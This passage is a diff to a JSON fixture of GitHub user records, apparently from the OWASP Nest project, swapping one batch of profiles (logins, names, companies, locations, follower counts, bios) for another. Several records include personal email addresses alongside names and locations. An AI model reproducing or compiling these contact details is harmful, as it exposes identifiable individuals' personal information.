"nahsra" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1594, + "pk": 6882, "fields": { - "nest_created_at": "2024-09-12T00:15:31.348Z", - "nest_updated_at": "2024-09-12T00:15:31.348Z", - "name": "", - "login": "ankitmdesai", + "nest_created_at": "2024-09-22T07:48:43.572Z", + "nest_updated_at": "2024-09-22T18:51:17.206Z", + "name": "Mark Koester", + "login": "MarkKoester", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23324833?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/24963825?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-11-07T23:58:21Z", - "updated_at": "2023-12-19T22:04:09Z", - "node_id": "MDQ6VXNlcjIzMzI0ODMz", + "public_repositories_count": 9, + "created_at": "2017-01-06T18:07:30Z", + "updated_at": "2024-06-29T00:45:47Z", + "node_id": "MDQ6VXNlcjI0OTYzODI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400103,24 +657977,24 @@ }, { "model": "github.user", - "pk": 1595, + "pk": 6883, "fields": { - "nest_created_at": "2024-09-12T00:15:32.540Z", - "nest_updated_at": "2024-09-12T00:15:32.540Z", - "name": "", - "login": "izian", + "nest_created_at": "2024-09-22T07:48:43.891Z", + "nest_updated_at": "2024-09-22T18:51:17.623Z", + "name": "Mark Colburn", + "login": "markcol", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6196762?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4448?v=4", "company": "", - "location": "", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2013-12-16T12:08:53Z", - "updated_at": "2024-06-19T14:11:30Z", - "node_id": "MDQ6VXNlcjYxOTY3NjI=", + "following_count": 4, + "followers_count": 11, + "public_gists_count": 5, + "public_repositories_count": 107, + "created_at": "2008-04-03T05:07:42Z", + "updated_at": "2024-08-12T04:48:25Z", + "node_id": "MDQ6VXNlcjQ0NDg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400128,24 +658002,24 @@ }, { "model": "github.user", - "pk": 1596, + "pk": 6884, "fields": { - "nest_created_at": "2024-09-12T00:15:33.371Z", - "nest_updated_at": "2024-09-12T00:15:33.371Z", - "name": "Ken Akune", - "login": "kenakune", + "nest_created_at": "2024-09-22T07:48:44.224Z", + "nest_updated_at": "2024-09-22T18:51:17.934Z", + "name": "Marián Horňák", + "login": "sysel-dragon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42453785?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/45171062?v=4", "company": "", - "location": "Ontario CA", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-08-16T23:05:46Z", - "updated_at": "2020-12-16T15:30:12Z", - "node_id": "MDQ6VXNlcjQyNDUzNzg1", + "public_repositories_count": 1, + "created_at": "2018-11-19T13:09:38Z", + "updated_at": "2020-06-19T08:07:45Z", + "node_id": "MDQ6VXNlcjQ1MTcxMDYy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400153,149 +658027,149 @@ }, { "model": "github.user", - "pk": 1597, + "pk": 6885, "fields": { - "nest_created_at": "2024-09-12T00:15:34.606Z", - "nest_updated_at": "2024-09-12T00:15:34.606Z", - "name": "", - "login": "bijarniy", + "nest_created_at": "2024-09-22T07:48:44.533Z", + "nest_updated_at": "2024-09-22T18:51:18.240Z", + "name": "Mario Nebl", + "login": "marionebl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/89252279?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4248851?v=4", + "company": "@Atlassian", + "location": "Sydney", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-08-20T10:27:19Z", - "updated_at": "2023-08-01T09:43:50Z", - "node_id": "MDQ6VXNlcjg5MjUyMjc5", - "bio": "", + "following_count": 134, + "followers_count": 462, + "public_gists_count": 44, + "public_repositories_count": 271, + "created_at": "2013-04-24T19:36:19Z", + "updated_at": "2024-09-20T11:29:20Z", + "node_id": "MDQ6VXNlcjQyNDg4NTE=", + "bio": "👨‍💻 🏄 👪", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1598, + "pk": 6886, "fields": { - "nest_created_at": "2024-09-12T00:15:36.632Z", - "nest_updated_at": "2024-09-12T00:15:42.722Z", - "name": "Sebastián Passaro", - "login": "spassarop", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/30912689?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:44.848Z", + "nest_updated_at": "2024-09-22T18:51:18.549Z", + "name": "Mario Lubenka", + "login": "saitho", + "email": "me@saitho.me", + "avatar_url": "https://avatars.githubusercontent.com/u/7293310?v=4", + "company": "@dkd ", + "location": "Frankfurt, Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2017-08-10T22:14:25Z", - "updated_at": "2024-08-23T11:46:10Z", - "node_id": "MDQ6VXNlcjMwOTEyNjg5", - "bio": "", + "following_count": 34, + "followers_count": 27, + "public_gists_count": 7, + "public_repositories_count": 72, + "created_at": "2014-04-14T17:57:14Z", + "updated_at": "2024-09-19T12:28:31Z", + "node_id": "MDQ6VXNlcjcyOTMzMTA=", + "bio": "B.Sc. ~ Backend Web Developer ~ PHP, JavaScript, TYPO3 @dkd ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "saitho95" } }, { "model": "github.user", - "pk": 1599, + "pk": 6887, "fields": { - "nest_created_at": "2024-09-12T00:15:40.658Z", - "nest_updated_at": "2024-09-12T00:15:40.658Z", - "name": "Václav Haisman", - "login": "wilx", - "email": "vhaisman@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1098563?v=4", + "nest_created_at": "2024-09-22T07:48:45.166Z", + "nest_updated_at": "2024-09-22T18:51:18.865Z", + "name": "Mariell Hoversholm", + "login": "Proximyst", + "email": "mariell@mardroemmar.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/19861299?v=4", "company": "", - "location": "Prague", + "location": "Uppsala, Sweden", "collaborators_count": 0, - "following_count": 1, - "followers_count": 31, - "public_gists_count": 44, - "public_repositories_count": 109, - "created_at": "2011-10-03T11:23:48Z", - "updated_at": "2024-08-27T07:44:34Z", - "node_id": "MDQ6VXNlcjEwOTg1NjM=", - "bio": "", + "following_count": 24, + "followers_count": 109, + "public_gists_count": 20, + "public_repositories_count": 59, + "created_at": "2016-06-10T17:26:06Z", + "updated_at": "2024-09-20T08:12:51Z", + "node_id": "MDQ6VXNlcjE5ODYxMjk5", + "bio": "I write code for cool things. Like birds.\r\n\r\n(she/they)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1600, + "pk": 6888, "fields": { - "nest_created_at": "2024-09-12T00:15:41.499Z", - "nest_updated_at": "2024-09-18T19:02:12.307Z", - "name": "Suganth M", - "login": "BloodDrag0n", + "nest_created_at": "2024-09-22T07:48:45.478Z", + "nest_updated_at": "2024-09-22T18:51:19.178Z", + "name": "Marie Hatcher", + "login": "hatchermarie2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/76839308?v=4", - "company": "", - "location": "Karur, India", + "avatar_url": "https://avatars.githubusercontent.com/u/50732645?v=4", + "company": "School", + "location": "Morgan city louisiana", "collaborators_count": 0, - "following_count": 5, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-01-01T12:17:18Z", - "updated_at": "2024-07-16T13:10:59Z", - "node_id": "MDQ6VXNlcjc2ODM5MzA4", - "bio": "Just a learning engineer", + "following_count": 35, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 88, + "created_at": "2019-05-17T07:23:50Z", + "updated_at": "2023-06-18T16:53:29Z", + "node_id": "MDQ6VXNlcjUwNzMyNjQ1", + "bio": "Im learning development", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1601, + "pk": 6889, "fields": { - "nest_created_at": "2024-09-12T00:15:43.536Z", - "nest_updated_at": "2024-09-12T00:15:43.536Z", - "name": "GodMeowIceSun", - "login": "GodMeowIceSun", - "email": "icesun@icesun.cn", - "avatar_url": "https://avatars.githubusercontent.com/u/53115201?v=4", + "nest_created_at": "2024-09-22T07:48:45.827Z", + "nest_updated_at": "2024-09-22T18:51:19.514Z", + "name": "Marek", + "login": "gitowiec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1553195?v=4", "company": "", - "location": "", + "location": "Gdańsk", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 3, - "public_repositories_count": 21, - "created_at": "2019-07-20T10:53:04Z", - "updated_at": "2024-09-09T05:54:39Z", - "node_id": "MDQ6VXNlcjUzMTE1MjAx", - "bio": "", - "is_hireable": false, + "following_count": 52, + "followers_count": 6, + "public_gists_count": 8, + "public_repositories_count": 50, + "created_at": "2012-03-19T15:06:17Z", + "updated_at": "2024-02-21T12:03:25Z", + "node_id": "MDQ6VXNlcjE1NTMxOTU=", + "bio": "I am a web developer, who likes JavaScript", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1602, + "pk": 6890, "fields": { - "nest_created_at": "2024-09-12T00:16:16.314Z", - "nest_updated_at": "2024-09-18T19:03:10.684Z", - "name": "", - "login": "DevSlop", + "nest_created_at": "2024-09-22T07:48:46.137Z", + "nest_updated_at": "2024-09-22T18:51:19.833Z", + "name": "Marcus Schweda", + "login": "mdschweda", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38781597?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3602273?v=4", + "company": "Gschwind Software", + "location": "Aachen, DE", "collaborators_count": 0, - "following_count": 0, - "followers_count": 23, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2018-04-27T08:43:13Z", - "updated_at": "2021-12-04T08:25:52Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjM4NzgxNTk3", + "following_count": 2, + "followers_count": 7, + "public_gists_count": 6, + "public_repositories_count": 14, + "created_at": "2013-02-15T12:23:08Z", + "updated_at": "2024-09-13T17:38:14Z", + "node_id": "MDQ6VXNlcjM2MDIyNzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400303,99 +658177,99 @@ }, { "model": "github.user", - "pk": 1603, + "pk": 6891, "fields": { - "nest_created_at": "2024-09-12T00:16:36.884Z", - "nest_updated_at": "2024-09-12T00:16:36.884Z", - "name": "Sarang Rajvansh", - "login": "sarangraj", + "nest_created_at": "2024-09-22T07:48:46.448Z", + "nest_updated_at": "2024-09-22T18:51:20.147Z", + "name": "Bastien Remy", + "login": "tsadiq", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13793132?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3443480?v=4", + "company": "Freelance", + "location": "Strasbourg", "collaborators_count": 0, - "following_count": 12, + "following_count": 1, "followers_count": 3, - "public_gists_count": 0, + "public_gists_count": 5, "public_repositories_count": 4, - "created_at": "2015-08-14T06:21:15Z", - "updated_at": "2024-08-11T11:29:07Z", - "node_id": "MDQ6VXNlcjEzNzkzMTMy", + "created_at": "2013-02-01T00:01:42Z", + "updated_at": "2023-10-30T15:49:23Z", + "node_id": "MDQ6VXNlcjM0NDM0ODA=", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1604, + "pk": 6892, "fields": { - "nest_created_at": "2024-09-12T00:16:37.751Z", - "nest_updated_at": "2024-09-13T05:13:04.301Z", - "name": "", - "login": "gabyavra", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11969114?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:46.759Z", + "nest_updated_at": "2024-09-22T18:51:20.455Z", + "name": "Bastien", + "login": "bastienmoulia", + "email": "bmoulia@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/686196?v=4", + "company": "SDWorx", + "location": "Bayonne, France", "collaborators_count": 0, - "following_count": 78, - "followers_count": 22, - "public_gists_count": 1, - "public_repositories_count": 190, - "created_at": "2015-04-15T22:23:45Z", - "updated_at": "2024-08-20T15:21:24Z", - "node_id": "MDQ6VXNlcjExOTY5MTE0", - "bio": "", + "following_count": 10, + "followers_count": 13, + "public_gists_count": 2, + "public_repositories_count": 103, + "created_at": "2011-03-23T13:57:00Z", + "updated_at": "2024-08-13T20:12:47Z", + "node_id": "MDQ6VXNlcjY4NjE5Ng==", + "bio": "Front-end developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1605, + "pk": 6893, "fields": { - "nest_created_at": "2024-09-12T00:16:42.607Z", - "nest_updated_at": "2024-09-18T19:03:05.979Z", - "name": "Franziska Bühler", - "login": "franbuehler", + "nest_created_at": "2024-09-22T07:48:47.066Z", + "nest_updated_at": "2024-09-22T18:51:20.794Z", + "name": "Basarat Ali Syed", + "login": "basarat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17731925?v=4", - "company": "SBB", - "location": "Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/874898?v=4", + "company": "https://booleanart.com", + "location": "Melbourne, Australia", "collaborators_count": 0, - "following_count": 32, - "followers_count": 63, - "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2016-03-08T21:18:59Z", - "updated_at": "2024-08-12T06:48:45Z", - "node_id": "MDQ6VXNlcjE3NzMxOTI1", - "bio": "Application Security Engineer", + "following_count": 55, + "followers_count": 3989, + "public_gists_count": 79, + "public_repositories_count": 442, + "created_at": "2011-06-25T07:41:43Z", + "updated_at": "2024-09-21T11:23:34Z", + "node_id": "MDQ6VXNlcjg3NDg5OA==", + "bio": "Creating educational developer content and coding practices 🌹", "is_hireable": false, - "twitter_username": "bufrasch" + "twitter_username": "basarat" } }, { "model": "github.user", - "pk": 1606, + "pk": 6894, "fields": { - "nest_created_at": "2024-09-12T00:16:57.603Z", - "nest_updated_at": "2024-09-18T19:03:13.865Z", - "name": "SecurityRAT", - "login": "SecurityRAT", + "nest_created_at": "2024-09-22T07:48:47.377Z", + "nest_updated_at": "2024-09-22T18:51:21.113Z", + "name": "Baron Chiu", + "login": "baron-chiu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19002622?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/21715194?v=4", "company": "", - "location": "", + "location": "Taipei, Taiwan", "collaborators_count": 0, - "following_count": 0, - "followers_count": 11, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2016-05-01T17:57:44Z", - "updated_at": "2016-07-13T21:11:35Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjE5MDAyNjIy", + "following_count": 1, + "followers_count": 2, + "public_gists_count": 4, + "public_repositories_count": 33, + "created_at": "2016-09-02T05:51:26Z", + "updated_at": "2024-09-11T07:19:12Z", + "node_id": "MDQ6VXNlcjIxNzE1MTk0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400403,24 +658277,24 @@ }, { "model": "github.user", - "pk": 1607, + "pk": 6895, "fields": { - "nest_created_at": "2024-09-12T00:17:00.725Z", - "nest_updated_at": "2024-09-13T05:12:44.126Z", - "name": "Samuel Marques", - "login": "samueljtmarques", + "nest_created_at": "2024-09-22T07:48:47.684Z", + "nest_updated_at": "2024-09-22T18:51:21.432Z", + "name": "Avi Vahl", + "login": "AviVahl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7689347?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8952081?v=4", + "company": "Wix.com", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-05-24T15:58:35Z", - "updated_at": "2021-04-12T08:26:21Z", - "node_id": "MDQ6VXNlcjc2ODkzNDc=", + "following_count": 4, + "followers_count": 53, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2014-09-29T01:06:58Z", + "updated_at": "2024-08-24T01:09:16Z", + "node_id": "MDQ6VXNlcjg5NTIwODE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400428,24 +658302,24 @@ }, { "model": "github.user", - "pk": 1608, + "pk": 6896, "fields": { - "nest_created_at": "2024-09-12T00:17:01.146Z", - "nest_updated_at": "2024-09-18T19:03:16.838Z", - "name": "René Reuter", - "login": "AresSec", + "nest_created_at": "2024-09-22T07:48:48.113Z", + "nest_updated_at": "2024-09-22T18:51:21.749Z", + "name": "", + "login": "aurichar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19144234?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60758782?v=4", + "company": "@Microsoft", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2016-05-02T04:55:09Z", - "updated_at": "2024-05-06T11:17:45Z", - "node_id": "MDQ6VXNlcjE5MTQ0MjM0", + "public_repositories_count": 1, + "created_at": "2020-02-06T21:26:42Z", + "updated_at": "2021-07-09T17:04:23Z", + "node_id": "MDQ6VXNlcjYwNzU4Nzgy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400453,174 +658327,274 @@ }, { "model": "github.user", - "pk": 1609, + "pk": 6897, "fields": { - "nest_created_at": "2024-09-12T00:17:02.362Z", - "nest_updated_at": "2024-09-12T00:17:02.362Z", - "name": "Christian Ruppert", - "login": "idl0r", - "email": "idl0r@qasl.de", - "avatar_url": "https://avatars.githubusercontent.com/u/32827?v=4", - "company": "", - "location": "Germany", + "nest_created_at": "2024-09-22T07:48:48.730Z", + "nest_updated_at": "2024-09-22T18:51:22.384Z", + "name": "Arturs Demiters", + "login": "demiters", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7239988?v=4", + "company": "CodeCraft", + "location": "Riga, Latvia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 18, - "public_gists_count": 1, - "public_repositories_count": 22, - "created_at": "2008-11-05T16:31:32Z", - "updated_at": "2024-06-11T14:35:38Z", - "node_id": "MDQ6VXNlcjMyODI3", - "bio": "", + "following_count": 21, + "followers_count": 14, + "public_gists_count": 13, + "public_repositories_count": 7, + "created_at": "2014-04-09T14:55:16Z", + "updated_at": "2024-09-14T11:30:56Z", + "node_id": "MDQ6VXNlcjcyMzk5ODg=", + "bio": "For every complex problem there is an answer that is clear, simple, and wrong.", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1610, + "pk": 6898, "fields": { - "nest_created_at": "2024-09-12T00:17:13.809Z", - "nest_updated_at": "2024-09-12T00:17:36.246Z", - "name": "Jay Mbolda", - "login": "rylyade1", + "nest_created_at": "2024-09-22T07:48:49.044Z", + "nest_updated_at": "2024-09-22T18:51:22.691Z", + "name": "Artur Parkhisenko", + "login": "arturparkhisenko", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12633674?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/139212?v=4", + "company": "@Vimeo", + "location": "Azeroth", "collaborators_count": 0, - "following_count": 5, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2015-05-27T22:01:49Z", - "updated_at": "2024-08-19T09:34:51Z", - "node_id": "MDQ6VXNlcjEyNjMzNjc0", - "bio": "", + "following_count": 745, + "followers_count": 198, + "public_gists_count": 100, + "public_repositories_count": 81, + "created_at": "2009-10-13T15:14:40Z", + "updated_at": "2024-09-01T16:20:27Z", + "node_id": "MDQ6VXNlcjEzOTIxMg==", + "bio": "Video Playback Experience Engineer & Manager 📹📼📺, 🇺🇦", "is_hireable": false, - "twitter_username": "rylyade" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1611, + "pk": 6899, "fields": { - "nest_created_at": "2024-09-12T00:17:37.538Z", - "nest_updated_at": "2024-09-18T19:03:19.132Z", - "name": "secureCodeBox", - "login": "secureCodeBox", - "email": "securecodebox@iteratec.com", - "avatar_url": "https://avatars.githubusercontent.com/u/34573705?v=4", - "company": "", - "location": "Germany", + "nest_created_at": "2024-09-22T07:48:49.365Z", + "nest_updated_at": "2024-09-22T18:51:22.999Z", + "name": "Arne Jørgensen", + "login": "arnested", + "email": "arne@arnested.dk", + "avatar_url": "https://avatars.githubusercontent.com/u/190005?v=4", + "company": "Reload A/S (@reload)", + "location": "Copenhagen, Denmark", "collaborators_count": 0, - "following_count": 0, - "followers_count": 79, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2017-12-15T12:25:56Z", - "updated_at": "2023-05-02T18:27:04Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjM0NTczNzA1", - "bio": "The secureCodeBox provide a toolchain for continuous security scanning (DevSecOps) of your applications to find the low-hanging fruit issues early.", + "following_count": 13, + "followers_count": 52, + "public_gists_count": 34, + "public_repositories_count": 99, + "created_at": "2010-01-26T10:01:16Z", + "updated_at": "2024-08-24T18:30:56Z", + "node_id": "MDQ6VXNlcjE5MDAwNQ==", + "bio": "Senior Developer, Systems Architect, and Partner at @reload.", "is_hireable": false, - "twitter_username": "secureCodeBox" + "twitter_username": "arnejoergensen" } }, { "model": "github.user", - "pk": 1612, + "pk": 6900, "fields": { - "nest_created_at": "2024-09-12T00:17:41.559Z", - "nest_updated_at": "2024-09-18T19:03:23.185Z", - "name": "Jannik Hollenbach", - "login": "J12934", + "nest_created_at": "2024-09-22T07:48:49.744Z", + "nest_updated_at": "2024-09-22T18:51:23.306Z", + "name": "Armano", + "login": "armano2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13718901?v=4", - "company": "@iteratec", - "location": "Hamburg, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/625469?v=4", + "company": "", + "location": "Belgium", "collaborators_count": 0, - "following_count": 12, - "followers_count": 67, - "public_gists_count": 9, - "public_repositories_count": 60, - "created_at": "2015-08-09T14:48:52Z", - "updated_at": "2024-03-26T20:54:44Z", - "node_id": "MDQ6VXNlcjEzNzE4OTAx", - "bio": "", + "following_count": 33, + "followers_count": 49, + "public_gists_count": 3, + "public_repositories_count": 147, + "created_at": "2011-02-18T15:39:51Z", + "updated_at": "2024-09-12T14:35:15Z", + "node_id": "MDQ6VXNlcjYyNTQ2OQ==", + "bio": "Hello 🐱", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6901, + "fields": { + "nest_created_at": "2024-09-22T07:48:50.081Z", + "nest_updated_at": "2024-09-22T18:51:23.616Z", + "name": "Armando Aguirre", + "login": "armanio123", + "email": "armando.aguirre@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13305542?v=4", + "company": "@Microsoft ", + "location": "Seattle, WA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 43, + "public_gists_count": 4, + "public_repositories_count": 25, + "created_at": "2015-07-12T23:45:36Z", + "updated_at": "2024-05-06T21:40:24Z", + "node_id": "MDQ6VXNlcjEzMzA1NTQy", + "bio": "Works on TypeScript @Microsoft.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1613, + "pk": 6902, "fields": { - "nest_created_at": "2024-09-12T00:17:42.825Z", - "nest_updated_at": "2024-09-12T00:17:42.825Z", - "name": "Yannik Fuhrmeister", - "login": "fuhrmeistery", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12710254?v=4", - "company": "@iteratec", - "location": "Germany", + "nest_created_at": "2024-09-22T07:48:50.399Z", + "nest_updated_at": "2024-09-22T18:51:23.916Z", + "name": "Arie Timmerman", + "login": "arietimmerman", + "email": "arietimmerman@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2026675?v=4", + "company": "a11n", + "location": "Zwolle", "collaborators_count": 0, - "following_count": 8, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2015-06-02T07:53:29Z", - "updated_at": "2024-06-17T16:52:00Z", - "node_id": "MDQ6VXNlcjEyNzEwMjU0", - "bio": "", + "following_count": 86, + "followers_count": 28, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2012-07-23T11:42:11Z", + "updated_at": "2024-08-16T08:57:11Z", + "node_id": "MDQ6VXNlcjIwMjY2NzU=", + "bio": "An independent Identity and Access Management architect who happens to like programming.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1614, + "pk": 6903, "fields": { - "nest_created_at": "2024-09-12T00:17:44.873Z", - "nest_updated_at": "2024-09-12T00:21:07.920Z", - "name": "Robert Felber", - "login": "rseedorff", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7081348?v=4", - "company": "iteratec GmbH", - "location": "Hamburg, Germany", + "nest_created_at": "2024-09-22T07:48:50.717Z", + "nest_updated_at": "2024-09-22T18:51:24.232Z", + "name": "Anton Zinovyev", + "login": "xobotyi", + "email": "xog3@yandex.ru", + "avatar_url": "https://avatars.githubusercontent.com/u/6178739?v=4", + "company": "Gaijin KFT", + "location": "Budapest", "collaborators_count": 0, - "following_count": 23, - "followers_count": 21, + "following_count": 2, + "followers_count": 71, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2014-03-27T12:56:30Z", - "updated_at": "2024-08-25T11:26:03Z", - "node_id": "MDQ6VXNlcjcwODEzNDg=", - "bio": "Project Leader @OWASP @secureCodeBox \r\nHead of IT Security @iteratec ", + "public_repositories_count": 25, + "created_at": "2013-12-13T13:44:08Z", + "updated_at": "2024-09-13T14:26:47Z", + "node_id": "MDQ6VXNlcjYxNzg3Mzk=", + "bio": "Web Dev Team Lead at @GaijinEntertainment, Founder of @react-hookz ", + "is_hireable": true, + "twitter_username": "xobotyi" + } +}, +{ + "model": "github.user", + "pk": 6904, + "fields": { + "nest_created_at": "2024-09-22T07:48:51.034Z", + "nest_updated_at": "2024-09-22T18:51:24.566Z", + "name": "Anton Medvedev", + "login": "antonmedv", + "email": "anton+github@medv.io", + "avatar_url": "https://avatars.githubusercontent.com/u/141232?v=4", + "company": "", + "location": "Switzerland", + "collaborators_count": 0, + "following_count": 110, + "followers_count": 2710, + "public_gists_count": 28, + "public_repositories_count": 59, + "created_at": "2009-10-18T10:22:42Z", + "updated_at": "2024-09-14T11:25:43Z", + "node_id": "MDQ6VXNlcjE0MTIzMg==", + "bio": "Ex-Google, Ex-Aviasales", + "is_hireable": true, + "twitter_username": "antonmedv" + } +}, +{ + "model": "github.user", + "pk": 6905, + "fields": { + "nest_created_at": "2024-09-22T07:48:51.359Z", + "nest_updated_at": "2024-09-22T18:51:24.883Z", + "name": "Tony Heckmann", + "login": "anthonyheckmann", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/386628?v=4", + "company": "EquityZen", + "location": "New York, NY", + "collaborators_count": 0, + "following_count": 66, + "followers_count": 43, + "public_gists_count": 29, + "public_repositories_count": 172, + "created_at": "2010-09-03T15:41:14Z", + "updated_at": "2024-08-08T21:06:34Z", + "node_id": "MDQ6VXNlcjM4NjYyOA==", + "bio": "\r\n Systems, Infrastructure, Reliability Engineer\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1615, + "pk": 6906, "fields": { - "nest_created_at": "2024-09-12T00:17:58.635Z", - "nest_updated_at": "2024-09-12T00:18:55.762Z", - "name": "Sebastian Franz", - "login": "SebieF", + "nest_created_at": "2024-09-22T07:48:51.667Z", + "nest_updated_at": "2024-09-22T18:51:25.202Z", + "name": "Byron Mayne", + "login": "ByronMayne", + "email": "Byronmayne@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6024487?v=4", + "company": "Electronic Arts", + "location": "Montreal, Quebec ", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 86, + "public_gists_count": 12, + "public_repositories_count": 53, + "created_at": "2013-11-24T16:49:55Z", + "updated_at": "2024-09-21T20:31:59Z", + "node_id": "MDQ6VXNlcjYwMjQ0ODc=", + "bio": "Senior Software Developer @ Electronic Arts", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6907, + "fields": { + "nest_created_at": "2024-09-22T07:48:51.985Z", + "nest_updated_at": "2024-09-22T18:51:25.516Z", + "name": "Bundit Jitkongchuen", + "login": "boybundit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32578476?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10710903?v=4", + "company": "@LINEMANWongnai", + "location": "Bangkok, Thailand", "collaborators_count": 0, - "following_count": 15, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2017-10-06T17:26:10Z", - "updated_at": "2024-08-02T09:21:25Z", - "node_id": "MDQ6VXNlcjMyNTc4NDc2", + "following_count": 26, + "followers_count": 30, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2015-01-26T15:49:06Z", + "updated_at": "2024-08-04T06:09:29Z", + "node_id": "MDQ6VXNlcjEwNzEwOTAz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400628,99 +658602,149 @@ }, { "model": "github.user", - "pk": 1616, + "pk": 6908, "fields": { - "nest_created_at": "2024-09-12T00:18:00.274Z", - "nest_updated_at": "2024-09-12T01:13:14.700Z", - "name": "Max Maass", - "login": "malexmave", + "nest_created_at": "2024-09-22T07:48:52.314Z", + "nest_updated_at": "2024-09-22T18:51:25.829Z", + "name": "Bruno Paz", + "login": "brpaz", "email": "", - "avatar_url": 